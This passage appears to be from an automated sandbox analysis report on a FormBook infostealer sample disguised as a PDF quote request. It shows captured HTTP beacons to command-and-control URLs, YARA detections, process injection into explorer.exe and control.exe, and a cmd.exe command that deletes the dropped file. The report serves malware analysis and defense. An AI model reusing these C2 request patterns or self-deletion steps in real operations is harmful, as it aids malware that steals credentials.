                                                                      Connection: close
                                                                      Location: http://www.etsy.com/shop/DesertFoxIndustries?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      7192.168.2.449777184.168.131.24180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Apr 8, 2021 13:23:06.701818943 CEST6613OUTGET /pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.tennesseewheelrepair.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:23:06.904542923 CEST6613INHTTP/1.1 301 Moved Permanently
                                                                      Server: nginx/1.16.1
                                                                      Date: Thu, 08 Apr 2021 11:23:06 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Location: https://musiccityrecon.com/wheel-repair.htm?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      8192.168.2.449778216.239.36.2180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Apr 8, 2021 13:23:12.007415056 CEST6616OUTGET /pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.rootedwithlovejax.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:23:12.111870050 CEST6617INHTTP/1.1 200 OK
                                                                      Content-Type: text/html; charset=utf-8
                                                                      x-ua-compatible: IE=edge
                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                      Pragma: no-cache
                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                      Date: Thu, 08 Apr 2021 11:23:12 GMT
                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Oq+MhZLqXn/lPJa2HbfaPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/GeoMerchantPrestoSiteUi/cspreport;worker-src 'self'
                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                      Server: ESF
                                                                      X-XSS-Protection: 0
                                                                      X-Content-Type-Options: nosniff
                                                                      Set-Cookie: NID=213=Q3aVk287agnix_VFlLOZ9f8yZ4NKvZ3Gx5T2uq5mhBEDndQJtvlbSmgVWdWVA_Limzw7UVlmkJM_oISIIEOzBYUYzRN8LDbRdzqogH-Cod8rdzxLYiDXnWMd0mCWh91iRVLe-oo4zLEtKedf1mnoB2xzK3tMk489BX8pYT_Q7Ho; expires=Fri, 08-Oct-2021 11:23:12 GMT; path=/; domain=.google.com; HttpOnly
                                                                      Accept-Ranges: none
                                                                      Vary: Accept-Encoding
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Data Raw: 38 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 6f 63 61 6c 42 75 73 69 6e 65 73 73 22 3e 3c 68 65 61 64 3e 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 75 73 69 6e 65 73 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 73 63 72 69 70 74 20 64 61 74 61 2d 69 64 3d 22 5f 67 64 22 20 6e 6f 6e 63 65 3d 22 4f 71 2b 4d 68 5a 4c 71 58 6e 2f 6c 50 4a 61 32 48 62 66 61 50 67 22 3e 77 69 6e 64 6f 77 2e 57 49 5a 5f 67 6c 6f 62 61 6c 5f 64 61 74 61 20 3d 20 7b 22 44 70 69 6d 47 66 22 3a 66 61 6c 73 65 2c 22 45 35 7a 41 58 65 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 72 6b 73 70 61 63 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 2c 22 45 50 31 79 6b 64 22 3a 5b 22 2f 5f 2f 2a 22 2c 22 2f 6c 6f 63 61 6c 2f 62 75 73 69 6e 65 73 73
                                                                      Data Ascii: 8000<!doctype html><html lang="en" dir="ltr" itemscope itemtype="https://schema.org/LocalBusiness"><head><base href="http://business.google.com/"><meta name="referrer" content="origin"><script data-id="_gd" nonce="Oq+MhZLqXn/lPJa2HbfaPg">window.WIZ_global_data = {"DpimGf":false,"E5zAXe":"https://workspace.google.com","EP1ykd":["/_/*","/local/business


                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      Analysis Process: RFQ_AP65425652_032421 isu-isu,pdf.exe PID: 6788 Parent PID: 6004

                                                                      General

                                                                      Start time:13:21:19
                                                                      Start date:08/04/2021
                                                                      Path:C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
                                                                      Imagebase:0x7ffabd480000
                                                                      File size:397431 bytes
                                                                      MD5 hash:98F9EA244308BB5969EA3C302C32EFCD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Analysis Process: RFQ_AP65425652_032421 isu-isu,pdf.exe PID: 6848 Parent PID: 6788

                                                                      General

                                                                      Start time:13:21:20
                                                                      Start date:08/04/2021
                                                                      Path:C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
                                                                      Imagebase:0x7ffabd480000
                                                                      File size:397431 bytes
                                                                      MD5 hash:98F9EA244308BB5969EA3C302C32EFCD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Analysis Process: explorer.exe PID: 3424 Parent PID: 6848

                                                                      General

                                                                      Start time:13:21:25
                                                                      Start date:08/04/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:
                                                                      Imagebase:0x7ff6fee60000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Analysis Process: control.exe PID: 5128 Parent PID: 3424

                                                                      General

                                                                      Start time:13:21:38
                                                                      Start date:08/04/2021
                                                                      Path:C:\Windows\SysWOW64\control.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\control.exe
                                                                      Imagebase:0xe70000
                                                                      File size:114688 bytes
                                                                      MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      Analysis Process: cmd.exe PID: 6316 Parent PID: 5128

                                                                      General

                                                                      Start time:13:21:43
                                                                      Start date:08/04/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
                                                                      Imagebase:0x11d0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Analysis Process: conhost.exe PID: 6500 Parent PID: 6316

                                                                      General

                                                                      Start time:13:21:43
                                                                      Start date:08/04/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff724c50000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >